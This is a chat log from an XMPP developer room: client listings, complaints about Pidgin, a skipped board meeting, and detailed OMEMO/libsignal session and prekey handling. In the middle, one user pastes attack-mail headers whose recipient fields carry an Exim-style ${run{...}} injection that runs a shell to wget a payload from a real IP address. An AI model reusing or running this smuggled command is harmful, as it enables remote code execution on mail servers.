related HN thread https://news.ycombinator.com/item?id=20291889#20292122
edhelas
if you guys want to reply
Yagiza
Daniel, are you here?
Daniel
Yagiza: it's probably better if you just ask your question since there are other people in here who can answer them as well
Daniel
As lovetox demonstrated yesterday
Yagiza
Daniel, ok
Yagiza
So, once session_cipher is created, I don't need session_builder anymore?
rion
Is it possible to add Psi here https://xmpp.org/getting-started/ ?
rion
ah there is a list on another page. ok.
Zash
https://xmpp.org/software/clients.html ?
rion
so the first list is discriminating all other clients :)
Zash
It would be nice if there were more detailed getting-started tutorials, with pictures and stuff. Maybe you could do one for Psi?
Zash
"get a client, get an account, done!" seems a bit bare
Zash
Let's not have another fight over this page š
jonas’
maybe clients should make tutorials superfluous by having proper onboarding
jonas’
with server lists and stuff
jonas’
and then we can make it a criterion for a client to have that type of flow to be listed on getting_started
jonas’
and Ge0rG can finally get rid of his pidgin
Zash
I don't see Pidgin there
jonas’
oh, so that was fixed already
rion
what's wrong with Pidgin?
jonas’
lack of support for any modern XMPP feature?
jonas’
and don’t get me started on plugins
Ge0rG
tl;dr: everything is wrong
jonas’
you know, pidgin, the type of client where you have to ask "did you write anything?" when the peer goes off- and online, because it doesn’t have stream management *or* MAM
jonas’
you know, pidgin, the type of client where you need to make other clients resource-lock to, otherwise you don’t get messages (no carbons)
jonas’
you know, pidgin, the type of client where you have to consciously log off before switching networks/suspending to not lose messages (again, no SM or MAM)
jonas’
you know, pidgin, the type of client which has an architecture which makes it easy for crypto plugins to accidentally send plaintext instead of ciphertext when you start a message with "/me"
jonas’
(I’m stopping now)
pep. deserves its own rant anyway
pep.
fail.
jonas’
bahaha
pep.
Why poezio.. why..
pep.
"//me" doesn't even work
jonas’
it can’t
jonas’
and you know why :)
jonas’
that’s why you want to rant about it
jonas’
you need ///me
pep.
Yes
jonas’
and then everyone will see "//me" :)
pep.
jonas’, while I have you, can you merge this plz https://github.com/xsf/xmpp.org/pull/582 :)
rion
Well I always used Pidgin just like a transport for spectrum =)
pep.
I think there are also horror stories with that
jonas’
pep., I don’t have github credentials at work
jonas’
oh, spectrum with libpurple? you know, the IRC transport where you would get disconnected when you sent a message starting with ``/quit`` to the transport?
jonas’
or was it the transport where you would get disconnected when you sent a multi-line message like:
foo
QUIT :bar
jonas’
to get disconnected?
jonas’
I *am* in a ranty mood today.
rion
unfortunately Pidgin's Skype integration is full of bugs. That's what I needed at most last time.
neshtaxmpp
moparisbest: someone comment 127.0.0.1 or number ip is not important and this is LIE. today my friend comment someone connect from 127.0.0.1 and send this:
Return-Path: <root@1ur.com>
X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@yourdomain.com
Delivered-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@yourdomain.com
Received: from localhost (localhost [127.0.0.1]) by yourdomain.com (Postfix) with ESMTP id A94DBA00B30 for <root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@yourdomain.con>; Wed, 26 Jun 2019 02:58:45 +0200 (CEST)
X-Quarantine-ID: <UdVj8nzxJJRS>
X-Virus-Scanned: Debian amavisd-new at yourdomain.com
X-Amavis-Alert: BAD HEADER SECTION, Missing required header field: "Date"
Message-Id: <20190626005845.A94DBA00B30@yourdomain.com>
Date: Wed, 26 Jun 2019 02:58:45 +0200 (CEST)
From: root@1ur.com
jonas’
neshtaxmpp, this room is not about email.
neshtaxmpp
jonas’: it is about sslh and someone try hack my friend server through sslh. i need someone comment how sslh sopve apache2 to show real ip and block 127.0.0.1 not to be used outside internet.
jonas’
this room also is not about sslh
jonas’
or sysadmin in general
vanitasvitae
neshtaxmpp, tell your friend to visit a local hackerspace to get help, but please do not bother the people in this room about it.
pep.
vanitasvitae, I wish hackerspaces were as big a thing anywhere else than they are in germany, but it's not the case :(
Daniel
I'm not entirely sure hackerspaces want to be a replacement for search engines
Zash
Maybe there's even a support venue for sslh itself.
Seve is on its way to the airport. Crossing fingers for a stable connection
Guus
Ralph and Matt can't make it.
Guus
if you're not on a reliable connection, we might as well skip the meeting, unless something important needs to be handled.
Guus
(assuming that nyco is here, in the first place)
Seve
Right
nyco
good guess
Guus
do we skip this meeting or not?
nyco
let me check the board
nyco
followup on badges is ok, I've not done the poll yet
nyco
so yes, I think we need more members to really advance
Seve
I guessed that, yes
Guus
ok, let's skip this meeting then.
nyco
three is good from a bylaws standpoint, but imho not enough for debate and decision making
Guus
agreed
nyco
ok
nyco
so, bang, and bang, done, thx all, +1W ;-)
Guus
have a good flight, Seve š
nyco
I believe I can flyyyyy
Seve
š
Guus
If your pilot sings that: run.
Seve
Oh... Haha
Seve
If I hear that, it may be too late
Ge0rG
Aw, what a pity. I wanted to provide an update regarding the German government contact.
Guus
Ge0rG - could you do that by mail, if it's longer than 2 sentences?
Guus
Do you need our input to progress?
Ge0rG
Guus: yes I can. No input needed so far. Should I write to members@?
Guus
if it's of interest to the members, yes. Otherwise: did we solve that Board mailing thingy?
Guus
(Seve?)
Yagiza
Well...
Yagiza
Where can I get session_cipher to decrypt pre_key_signal_message?
Ge0rG
Guus: IIRC somebody is now looking for external mail to board@ or somesuch
jonas’
Ge0rG, Seve typically does that
Guus
(Who's now in a plane)
Guus
Ge0rG if you're unsure if it's suitable for members@, mail it to me, and I'll forward it to board@
Ge0rG
Guus: I'll try to write down something when I have a bit of time. Don't think there are any issues with using members@
Guus
tx
lovetox
Yagiza, yes session is only once build, after that you load the session from the database and use it to decrypt and encrypt
Yagiza
lovetox, so, I have different question.
Yagiza
lovetox, how to generate session_cipher to decrypt pre_key_signal_message?
Yagiza
Do I have to decrypt it with a key, generated with empty session_builder (before session_builder_process_pre_key_bundle()) call?
lovetox
hm i cant talk much about the C lib but in the python port
lovetox
you create a new session_cipher
lovetox
then use session_cipher.decryptPkmsg(pre_key_message)
lovetox
and the decryptPkmsg, does create a new session on its own and saves it to the database
lovetox
so nothing more to do here
lovetox
is there something similar in the C version?
lovetox
there session_cipher_decrypt_pre_key_signal_message
lovetox
looked it up
lovetox
it does everything for you
lovetox
create a new session, store it to the db, decrypt the message
Yagiza
lovetox, so, after that call, current session is invalidated and new session is created instead?
lovetox
yes
lovetox
thats also how you refresh a session, you just send a new pkmsg
lovetox
but normally this should not be necessary
Yagiza
lovetox, do I need to generate new session_cipher after that?
lovetox
session_cipher is only a wrapper
lovetox
it does not hold any state itself
lovetox
you call decrypt or encrypt on it, what it does is it loads the session from the database every time
lovetox
you can also recreate it after each message if you want
Yagiza
lovetox, so, once session is changed, existing session_cipher will use a new session data?
lovetox
yes
lovetox
i create it on the first message for each contact
lovetox
and cache it
lovetox
but you dont have to, you can also create it on every message new, does not make a difference
Yagiza
lovetox, IC
lovetox
session is loaded on each message, modified and stored back to database
lovetox
otherwise it would be highly likely that you have invalid session if your application crashes
lovetox
so no state is held in memory
Yagiza
lovetox, ok
Yagiza
lovetox, so, I need session_builder only when initiating session. If session initiated by other party, it is created by session_cipher_decrypt_pre_key_signal_message(), right?
lovetox
yes
Yagiza
lovetox, IC. Thank you.
Yagiza
lovetox, and the last question.
Yagiza
lovetox, how do I decide, to which resources of my contact do I need to send encrypted messages, and to which of them not encrypted? Only by checking if it has 'eu.siacs.conversations.axolotl.devicelist+notify' #disco feature?
lovetox
no
lovetox
you dont send messages to resources
lovetox
or better said all messages you send will arrive at all resources of the contact
lovetox
because of carbons, mam etc
Yagiza
lovetox, I can't be sure that all of resources of my contact do support OMEMO.
lovetox
you dont change anything about how you send a message
lovetox
Yagiza, you can be sure that one device supports it
lovetox
and thats enough
lovetox
the user decides if he wants to send encrypted or not
lovetox
not the client
Yagiza
lovetox, what do you mean? I have a contact. And I see all of their resources. And I can choose to which of them to send message.
Yagiza
lovetox, at least, my client allows that.
lovetox
so your client makes the server not save the message in MAM
lovetox
?
lovetox
otherwise you cant control who downloads a message from the archive
Yagiza
lovetox, my client does not support MAM yet.
lovetox
but the server has
Yagiza
lovetox, so?
lovetox
and the server stores all messages in MAM
lovetox
if you want or not
Yagiza
lovetox, ok
lovetox
and other clients will download it
lovetox
dont assume you can control who gets the message
lovetox
other than the barejid
lovetox
you find keys in pep
lovetox
then you know at least one device of the contact supports it
lovetox
and afterwards you give your user the decision if he wants to talk encrypted or not
Yagiza
lovetox, anyway. When I send encrypted message, clients, which do not support OMEMO will just ignore it. When I send unencrypted message, all the clients may read and display it.
lovetox
yes
Yagiza
And I can't be sure, that my or their server do support MAM.
lovetox
and you cant know if the user is fine with that
lovetox
the user maybe totally fine with one of his devices ignoring omemo
lovetox
and only one device being able to decrypt
Yagiza
Yes
lovetox
i just try to save you implementation trouble, you can try to make logic that start and stops encrypting if this and that happens
lovetox
but i tell you from experience users will come and tell you they want to make the decision themself
lovetox
especially disco info is useless here
Yagiza
So, if user enabled OMEMO encryption for a contact, but selected a resource, which do not support it, I must somehow make him aware of the fact and send unencrypted messages in that case.
lovetox
it only works if a client is online
lovetox
omemo works also if the contact is offline
lovetox
dont forget that
Yagiza
lovetox, yes. That's not a problem.
lovetox
Yagiza, why do you even have UI where the user selects a resource
Yagiza
lovetox, I'm telling only about the case above.
Yagiza
lovetox, because that's a good tradition.
lovetox
if i talk as a user, i dont care how many devices are online of my friend, i just want to send him a message
Yagiza
lovetox, not all the servers do support MAM or Message Archiving or Message Carbons.
lovetox
Yagiza, then we should tell the admins to upgrade
Yagiza
So, it's a good thing to have an ability to specify a resource.
lovetox
i cant help you with that, thats not a usecase for me to write clients for servers from the stoneage
Yagiza
lovetox, IC. So, you think sending messages to bare JID is a good idea?
lovetox
Yagiza, thats not what i wanted to say, although many devs in the community would answer that question with yes
lovetox
what i want to say is, that i think its bad UI if you make the user force a resource
lovetox
because user has to know about what a resource is, that is xmpp protocol stuff
lovetox
users just want to write messages
lovetox
and you should not assume only because you address a message to a resource, that only this resource will get the message
Yagiza
lovetox, yes, of course.
lovetox
that is 99% wrong assumption in our current world
jonas’
send to the bare JID
jonas’
you’ll be in pain when IM-NG lands otherwise :)
pep.
When is that :/
pep.
Any client/server already doing things with it? More than what MattJ said at the summit
jonas’
I think there was some discussion about that type of stuff the other day
jonas’
but don’t pin me down on that
jonas’
I wish I had time to experiment with things, but so many fires to fight these weeks
and I thought we had bad luck with the 38°C yesterday
jonas’
(dropped to 25°C today)
lovetox
i dont find the xep that defines dataforms for disco info
lovetox
ah 128
Yagiza
And one more question...
Yagiza
After I processed PreKeySignalMessage, an appropriate pre key is automatically substituted with a new one? So, I only need to refresh the bundle on the PEP server?
lovetox
no
lovetox
the prekey which was used, is deleted from the database
lovetox
but no new keys are generated
lovetox
you have to do this yourself
lovetox
and of course you should instantly delete the prekey used from pep
Yagiza
lovetox, so, I need generate a new key instead of used one? Ok.
lovetox
you dont have to generate new ones, i mean we publish 100 keys
lovetox
you can also generate new ones when you reach 90 or something like this
lovetox
but you have to delete the used one from pep, so you have to push 99 keys anyway
lovetox
so i would say just generate one and push 100 again
Yagiza
lovetox, I aware about publishing new bundle of 100 keys.
Yagiza
lovetox, the only question was about generating a new key instead of used one.
lovetox
im not following, if a key is used, you only have 99, if you aware that you should have 100 keys
lovetox
what is there for other option than generate 1 new key?
Yagiza
lovetox, I didn't know old key is deleted and a new one is generated automatically, or not. So, once you told me that it is deleted, but no new key is generated, I understand, that I only need to generate a new key to replace used one.
lovetox
ah ok :)
lovetox
and Yagiza we should move the discussion to xmpp:jdev@conference.jabber.org?join this room is more suited
Yagiza
lovetox, yes. I tried to ask there, but almost no one replied.
lovetox
im always joined there :)
Yagiza
lovetox, me too.
vanitasvitae
Yagiza: you could take a look at https://blog.jabberhead.tk/2019/04/15/closer-look-at-the-double-ratchet/ to understand the inner workings of the signal protocol.
Yagiza
vanitasvitae, ok, thank you!
lovetox
can someone verify that the example here is wrong https://xmpp.org/extensions/xep-0128.html#examples
lovetox
as it has a field without type which means text-single
lovetox
but still has multiple <values>
lovetox
which is a MUST NOT in 0004
lovetox
or am i missing something
moparisthebest
jonas’, vanitasvitae: I've tried more than once to help neshtaxmpp by linking him to exactly what he was asking for etc, he's either a troll or beyond help, I just ignore now
pep.
moparisthebest, yeah I have also given in this domain :)